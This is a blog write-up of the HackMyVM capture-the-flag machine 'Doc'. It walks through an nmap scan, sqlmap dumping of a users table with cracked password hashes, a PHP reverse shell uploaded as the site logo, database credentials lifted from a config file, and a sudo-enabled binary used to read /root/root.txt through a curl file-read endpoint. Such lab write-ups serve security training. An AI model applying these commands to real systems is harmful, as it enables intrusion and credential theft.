Home Doc
Post
Cancel

Doc

maxin on Dec 31, 20212021-12-31T09:45:48-03:00
Updated Mar 162022-03-16T09:41:55-03:00 1 min read

HackMyVM

Enumeration

# Nmap 7.92 scan initiated Tue Dec 28 13:14:55 2021 as: nmap -sC -sV -v -oN nmap 192.168.0.166
Nmap scan report for 192.168.0.166
Host is up (0.017s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0
|_http-title: Online Traffic Offense Management System - PHP
|_http-server-header: nginx/1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 28 13:15:02 2021 -- 1 IP address (1 host up) scanned in 6.97 seconds

Port 80

We need to add doc.hmv to our /etc/hosts file

/admin/login.php

Untitled

Use the option “copy to file” and use this file on SQLmap

sqlmap -r req.txt --dump --dbs
[13:58:46] [INFO] retrieved: Admin
[13:59:01] [INFO] retrieved: 0192023a7bbd73250516f069df18b500
[14:00:42] [INFO] retrieved: 1
[14:00:44] [INFO] retrieved: adminyo
[14:01:07] [INFO] retrieved: uploads/1629336240_avatar.jpg
[14:02:47] [INFO] retrieved: 2021-08-19 09:24:25
[14:03:57] [INFO] retrieved:  
[14:04:04] [INFO] retrieved: John
[14:04:21] [INFO] retrieved: 9
[14:04:24] [INFO] retrieved:  
[14:04:30] [INFO] retrieved: Smith
[14:04:49] [INFO] retrieved: 1254737c076cf867dc53d60a0364f38e
sqlmap -r req.txt -D doc -T users --dump --dbms=mysql
Admin    | 0192023a7bbd73250516f069df18b500 (admin123)  | adminyo  | Adminstrator
Smith    | 1254737c076cf867dc53d60a0364f38e (jsmith123) | jsmith   | John

Log on /admin/login.php with adminyo | admin123

Reverse shell

  • Go to settings
  • Change the System logo to be a php reverse shell

User

/var/www/html/traffic_offense/initialize.php
if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");

Root

sudo -l

User bella may run the following commands on doc:
    (ALL : ALL) NOPASSWD: /usr/bin/doc

Start the binary with sudo and open another reverse shell

Use curl on getfile directory with key parameter. We can access every file on the box

curl localhost:7890/getfile?key=/root/root.txt
HackMyVM
Writeup
This post is licensed under CC BY 4.0 by the author.
Recent Update
Trending Tags
Writeup
Contents

Noob

Stars

Trending Tags

Writeup